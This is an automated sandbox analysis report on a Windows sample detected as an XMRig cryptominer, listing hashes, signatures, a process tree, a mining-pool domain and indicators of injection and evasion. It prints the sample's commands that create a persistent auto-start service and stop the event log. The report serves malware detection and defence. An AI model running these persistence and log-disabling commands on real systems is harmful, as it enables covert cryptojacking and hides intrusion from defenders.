Edit tour

Windows Analysis Report
LfHJdrALlh.exe

Overview

General Information

Sample name:	LfHJdrALlh.exe renamed because original name is a hash value
Original sample name:	0e540d9532a8ea783d15290e948d2e0b744c5c61dc7d1953fcfef1aeda4be999.exe
Analysis ID:	1570391
MD5:	17e83a7ef86ed642e8182c051cd382fa
SHA1:	d5d3e3d6a8b9566b58275ce9c200e9b74f2310ec
SHA256:	0e540d9532a8ea783d15290e948d2e0b744c5c61dc7d1953fcfef1aeda4be999
Tags:	exeuser-Chainskilabs
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop EventLog

System process connects to network (likely due to code injection or exploit)

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

DNS related to crypt mining pools

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LfHJdrALlh.exe (PID: 6024 cmdline: "C:\Users\user\Desktop\LfHJdrALlh.exe" MD5: 17E83A7EF86ED642E8182C051CD382FA)

sc.exe (PID: 1216 cmdline: C:\Windows\system32\sc.exe delete "DQKVOCSM" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2520 cmdline: C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 180 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7112 cmdline: C:\Windows\system32\sc.exe start "DQKVOCSM" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ograohtgkfie.exe (PID: 2696 cmdline: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe MD5: 17E83A7EF86ED642E8182C051CD382FA)

conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 3136 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000C.00000002.4486146482.00000000005A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: explorer.exe PID: 3136	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Sigma Signatures

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\LfHJdrALlh.exe", ParentImage: C:\Users\user\Desktop\LfHJdrALlh.exe, ParentProcessId: 6024, ParentProcessName: LfHJdrALlh.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto", ProcessId: 2520, ProcessName: sc.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\LfHJdrALlh.exe", ParentImage: C:\Users\user\Desktop\LfHJdrALlh.exe, ParentProcessId: 6024, ParentProcessName: LfHJdrALlh.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 180, ProcessName: sc.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: LfHJdrALlh.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4486146482.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3136, type: MEMORYSTR

DNS related to crypt mining pools

Source: unknown

DNS query: name: xmr-eu1.nanopool.org

Source: LfHJdrALlh.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.dr

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 51.15.58.224 10343

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 51.15.58.224:10343

Source: Joe Sandbox View

IP Address: 51.15.58.224 51.15.58.224

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: xmr-eu1.nanopool.org

Source: explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: explorer.exe, 0000000C.00000002.4486146482.000000000062C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crlQr
Source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4486146482.000000000062C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_caY

Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Code function: 0_2_00007FF612D31394 NtWaitForWorkViaWorkerFactory,	0_2_00007FF612D31394
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Code function: 9_2_00007FF621A91394 NtClose,	9_2_00007FF621A91394
Source: C:\Windows\System32\conhost.exe	Code function: 11_2_0000000140001394 NtApphelpCacheControl,	11_2_0000000140001394

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

File created: C:\Windows\TEMP\xvkjzlkkmfrj.sys

Jump to behavior

Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Code function: 0_2_00007FF612D33B30	0_2_00007FF612D33B30
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Code function: 9_2_00007FF621A93B30	9_2_00007FF621A93B30
Source: C:\Windows\System32\conhost.exe	Code function: 11_2_0000000140003150	11_2_0000000140003150
Source: C:\Windows\System32\conhost.exe	Code function: 11_2_00000001400026E0	11_2_00000001400026E0

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\xvkjzlkkmfrj.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Code function: String function: 00007FF612D31394 appears 32 times
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Code function: String function: 00007FF621A91394 appears 32 times

Source: xvkjzlkkmfrj.sys.9.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.evad.mine.winEXE@18/2@1/1

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

File created: C:\Windows\TEMP\xvkjzlkkmfrj.sys

Jump to behavior

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Process created: C:\Windows\explorer.exe
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: LfHJdrALlh.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
